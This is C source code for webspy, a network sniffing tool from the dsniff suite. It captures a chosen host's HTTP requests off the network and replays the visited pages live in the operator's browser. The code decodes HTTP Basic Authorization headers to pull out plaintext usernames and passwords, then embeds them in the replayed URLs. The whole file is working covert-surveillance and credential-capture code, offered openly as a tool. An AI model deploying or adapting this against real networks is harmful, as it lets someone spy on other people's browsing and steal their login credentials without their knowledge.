/*
  webspy.c

  Sniff a user's web session, follow it real-time in our browser.
  
  Copyright (c) 1999 Dug Song <dugsong@monkey.org>

  $Id: webspy.c,v 1.23 2000/06/14 06:10:00 dugsong Exp $
*/

#include "config.h"

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#ifdef HAVE_ERR_H
#include <err.h>
#endif
#include <X11/Xlib.h>
#include <libnet.h>
#include <nids.h>
#include "base64.h"
#include "version.h"

/*
  Interface to jwz's remote.c: the entry point we call, plus the two
  strings declared "for jwz's remote.c" (presumably read by that file;
  progname is also printed by usage()).
*/
extern int	 mozilla_remote_commands(Display *, Window, char **);
char		*expected_mozilla_version = "4.7";
char		*progname = "webspy";

/* Globals. */
Display		*dpy;		/* X display, opened in main() */
char		 cmd[2048];	/* remote command text, rebuilt per request */
char		*cmdtab[2];	/* { cmd, NULL }, for mozilla_remote_commands() */
in_addr_t	 host;		/* address of the client being watched */

void
usage(void)
{
	fprintf(stderr, "Version: " VERSION "\n"
		"Usage: %s [-i interface] host\n", progname);
	exit(1);
}

/*
  Locate substring in a binary string.

  Searches the first blen bytes of big for the llen-byte sequence
  little.  Neither buffer has to be NUL-terminated and both may contain
  embedded NUL bytes.

  Returns a pointer to the first match inside big, or NULL when there
  is no match, when either length is negative, or when little is longer
  than big.  An empty needle (llen == 0) matches at big.
*/
u_char *
bufbuf(u_char *big, int blen, u_char *little, int llen)
{
	int i, last;
	
	/*
	 * Reject impossible searches up front.  Computing
	 * big + blen - llen with llen > blen would form a pointer in
	 * front of the buffer, and a negative llen would reach memcmp()
	 * as a huge size_t.
	 */
	if (blen < 0 || llen < 0 || llen > blen)
		return (NULL);
	
	/* Last offset at which a full llen-byte window still fits. */
	last = blen - llen;
	
	for (i = 0; i <= last; i++) {
		if (memcmp(big + i, little, (size_t)llen) == 0)
			return (big + i);
	}
	return (NULL);
}

/*
  Decide whether a requested URL looks like a page worth displaying.

  An "http://host" prefix is skipped when a path follows it, and
  anything from the first '?' on is left out of the comparison.  The
  remaining path is matched case-insensitively against a list of
  accepted suffixes and then a (currently empty) list of accepted
  prefixes.

  Returns 1 on a match, 0 otherwise.
*/
int
is_display_url(char *url)
{
	static char *good_prefixes[] = { NULL };
	static char *good_suffixes[] = { ".html", ".htm", "/", ".shtml",
					 ".cgi", ".asp", ".php3", ".txt",
					 ".xml", ".asc", NULL };
	char *path, *mark;
	int path_len, n, k;
	
	/* Get URI */
	path = url;
	if (strncasecmp(url, "http://", 7) == 0) {
		mark = strchr(url + 7, '/');
		if (mark != NULL)
			path = mark;
	}
	
	/* Get URI length, without QUERY_INFO */
	mark = strchr(path, '?');
	if (mark != NULL)
		path_len = mark - path;
	else
		path_len = strlen(path);
	
	for (k = 0; good_suffixes[k] != NULL; k++) {
		n = strlen(good_suffixes[k]);
		if (n <= path_len &&
		    strncasecmp(path + path_len - n, good_suffixes[k], n) == 0)
			return (1);
	}
	for (k = 0; good_prefixes[k] != NULL; k++) {
		n = strlen(good_prefixes[k]);
		if (n <= path_len &&
		    strncasecmp(path, good_prefixes[k], n) == 0)
			return (1);
	}
	return (0);
}

/*
  Parse every complete HTTP request header (one terminated by a blank
  line) found in the first len bytes of buf.  For each GET of a URL
  that is_display_url() accepts, build an openURL() command in the
  global cmd buffer and send it with mozilla_remote_commands().

  addr supplies the destination address, used for the host part of the
  URL when the request carries neither an absolute URI nor a Host:
  header.  buf is modified in place while parsing.

  Returns the number of bytes occupied by the complete requests that
  were processed; a trailing partial request is not counted.  The
  caller hands this count to nids_discard().

  XXX - we should really be sniffing (and HTML-parsing) the returned
  pages, not just the request URLs. this is why we don't handle
  frames, some CGIs, banner ads, etc. correctly.
*/
int
process_http_request(struct tuple4 *addr, u_char *buf, int len)
{
	char *p, *s, *e, *sp, *uri, *vhost, *auth;
	int i, discard = 0;
	
	/* Process requests. */
	for (s = (char *)buf;
	     (e = (char *)bufbuf((u_char *)s, len,
				 (u_char *)"\r\n\r\n", 4)) != NULL;
	     s = e + 4) {
		i = (e + 4) - s;
		discard += i; len -= i;
		*e = '\0';
		
		uri = vhost = auth = NULL;
		
		/*
		 * Parse header.  Tokenize from s, the start of the current
		 * request; starting from buf would re-read the first
		 * (already chopped-up) request for every pipelined request
		 * that follows it.
		 */
		for (p = strtok(s, "\r\n"); p; p = strtok(NULL, "\r\n")) {
			if (strncasecmp(p, "GET ", 4) == 0) {
				uri = p + 4;
				
				/*
				 * Cut the request line after the URI first,
				 * so the '/' search below cannot wander
				 * into the trailing "HTTP/x.y".
				 */
				if ((sp = strchr(uri, ' ')) != NULL)
					*sp = '\0';
				
				if (strncasecmp(uri, "http://", 7) == 0) {
					vhost = uri + 7;
					uri = strchr(vhost, '/');
					if (uri == NULL) {
						/* Absolute URI without a path. */
						warnx("\tignoring: %s", p + 4);
						vhost = NULL;
						break;
					}
					/*
					 * Slide the host name to the front
					 * of the line so it can be
					 * terminated without clobbering
					 * the path.
					 */
					i = uri - vhost;
					memmove(p, vhost, i);
					p[i] = '\0';
					vhost = p;
				}
				if (!is_display_url(uri)) {
					warnx("\tignoring: %s", uri);
					uri = NULL;
					break;
				}
			}
			else if (strncasecmp(p, "Authorization: Basic ", 21)
				 == 0) {
				p += 21;
				/* Decode in place. */
				i = base64_pton(p, p, strlen(p));
				/*
				 * NOTE(review): base64_pton() presumably
				 * returns a negative value on malformed
				 * input - confirm against base64.h.  Never
				 * index with it in that case.
				 */
				if (i >= 0) {
					p[i] = '\0';
					auth = p;
				}
			}
			else if (strncasecmp(p, "Host: ", 6) == 0)
				vhost = p + 6;
		}
		if (vhost == NULL)
			vhost = (char *)libnet_host_lookup(addr->daddr, 0);
		
		if (uri != NULL && vhost != NULL) {
			/*
			 * NOTE(review): auth, vhost and uri come straight
			 * off the wire and are embedded unescaped.
			 */
			snprintf(cmd, sizeof(cmd), "openURL(http://%s%s%s%s)",
				 auth ? auth : "", auth ? "@" : "",
				 vhost, uri);
			warnx("%s", cmd);
			mozilla_remote_commands(dpy, 0, cmdtab);
		}
	}
	return (discard);
}

/*
  TCP stream callback, registered with nids_register_tcp() in main().

  Streams are ignored unless they originate from the watched host and
  go to port 80, 3128 or 8080.  On NIDS_JUST_EST collection of the
  data sent to the server is switched on.  On NIDS_JUST_EST and
  NIDS_DATA any new data is parsed and the consumed bytes are
  discarded.  In every other state whatever is still buffered is
  parsed once, without discarding.  yoda is unused.
*/
void
sniff_http_client(struct tcp_stream *ts, void **yoda)
{
	int state, pending, used;
	
	/* Only handle HTTP client traffic. */
	if (ts->addr.saddr != host)
		return;
	switch (ts->addr.dest) {
	case 80:
	case 3128:
	case 8080:
		break;
	default:
		return;
	}
	
	state = ts->nids_state;
	
	if (state == NIDS_JUST_EST) {
		/* Collect data. */
		ts->server.collect = 1;
	}
	
	if (state == NIDS_JUST_EST || state == NIDS_DATA) {
		if (ts->server.count_new == 0)
			return;
		pending = ts->server.count - ts->server.offset;
		used = process_http_request(&ts->addr, ts->server.data,
					    pending);
		nids_discard(ts, used);
		return;
	}
	
	/* Any other state: look at what is left, keep nothing back. */
	if (ts->server.count != 0) {
		pending = ts->server.count - ts->server.offset;
		process_http_request(&ts->addr, ts->server.data, pending);
	}
}

/*
  Do-nothing logging hook; main() installs it as nids_params.syslog.
  All four arguments are ignored.
*/
void
null_syslog(int type, int errnum, struct ip *iph, void *data)
{
	/* Intentionally empty. */
	(void)type;
	(void)errnum;
	(void)iph;
	(void)data;
}

/*
  Entry point.  Parses the command line (-i selects the capture
  device, any other option prints usage), resolves the single host
  argument, opens the default X display, configures and initializes
  libnids, registers sniff_http_client() and runs the capture loop.
*/
int
main(int argc, char *argv[])
{
	int opt;
	
	for (;;) {
		opt = getopt(argc, argv, "i:h?V");
		if (opt == -1)
			break;
		if (opt == 'i')
			nids_params.device = optarg;
		else
			usage();
	}
	argv += optind;
	argc -= optind;
	
	/* Exactly one positional argument: the host to watch. */
	if (argc != 1)
		usage();
	
	/* NULL-terminated command vector for mozilla_remote_commands(). */
	cmdtab[0] = cmd;
	cmdtab[1] = NULL;
	
	host = libnet_name_resolve(argv[0], 1);
	if (host == -1)
		errx(1, "unknown host");
	
	dpy = XOpenDisplay(NULL);
	if (dpy == NULL)
		errx(1, "connection to local X server failed!");
	
	nids_params.syslog = null_syslog;
	nids_params.scan_num_hosts = 0;
	
	if (!nids_init())
		errx(1, "%s", nids_errbuf);
	
	nids_register_tcp(sniff_http_client);
	
	warnx("listening on %s", nids_params.device);
	nids_run();
	
	/* NOTREACHED */
	
	exit(0);
}

/* 5000. */
